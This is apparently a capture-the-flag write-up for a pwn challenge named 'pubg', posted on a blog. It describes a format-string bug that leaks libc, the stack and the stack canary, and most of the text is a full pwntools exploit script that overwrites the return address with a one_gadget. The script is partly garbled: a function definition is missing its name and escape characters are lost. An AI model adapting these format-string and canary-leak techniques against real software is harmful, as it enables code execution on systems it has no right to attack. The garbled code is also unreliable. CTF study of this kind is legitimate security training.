Interesting game
PUBG
PUBG
- PICK A GUN first
- AND you have two choise : gang or gou
- gou :
you may find AWM
- gang :
if you dont have AWM you will die
- IF you win you can leak something and you can overflow to control the RIP
- so enjoy the game
Entry point
- you can leak libc by
1
2
3
4
5
6
7
8
9
|
for ( j = 0; j <= 3; ++j )
{
if ( s[j] != buf[j] )
{
printf(s);
puts(" has no airdrop");
return __readfsqword(0x28u) ^ v4;
}
}
|
- Luckily you can leak j .so you can burp the position of airdrop
- so you will get the AWM
- and use the only chance to leak canary
- so go to control EIP
EXP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
|
from pwn import *
def (c):
p.readuntil("> ")
p.sendline(str(c))
def airdrop(c):
cmd(2)
p.readuntil("position:")
p.send(c)
p=process("./pubg")
p=remote("127.0.0.1",1025)
cmd(1)
cmd(1)
airdrop("%p%p%p%pn")
p.readuntil("0x25")
base=int(p.readline(),16)-0x5cd700+0x7fd980588000-0x7fd98058d000
log.warning("Libc:%s",hex(base))
airdrop("%a%a%a%a%a")
p.readuntil("ap-10220x0.0")
stack=int("0x"+p.read(11)+"0",16)
log.info("stack:%s",hex(stack))
res=""
for x in range(3):
for y in range(1,256):
if (chr(y)!='n' and chr(y)!='$' and chr(y)!='*' and chr(y)!='|'):
airdrop(res+"{}%p|%pn".format(chr(y).ljust(3-x,'x01')))
p.readuntil("|")
data=p.readline()
if data=="(nil)n":
data=0
else :
data=int(data,16)
if (data==x+1):
res+=chr(y)
break
else:
continue
airdrop(res)
cmd(1)
p.readuntil("chicken:n")
canary_add=(0x7ffe2c5822c8-0x7ffe2c5823d0)+stack
p.sendline(str(canary_add+1))
sleep(0.1)
p.readuntil("The ")
data="x00"+p.read(7)
canary=u64(data.ljust(8,'x00'))
log.info("Cnary:%s",hex(canary))
p.readuntil("~n")
off=0x20
one=base+0x45216
p.send("x00"*off+p64(canary)*3+p64(one)+"n")
p.interactive()
|
review
Is a interesting game
There are lots of little trick in this challenge.
近期评论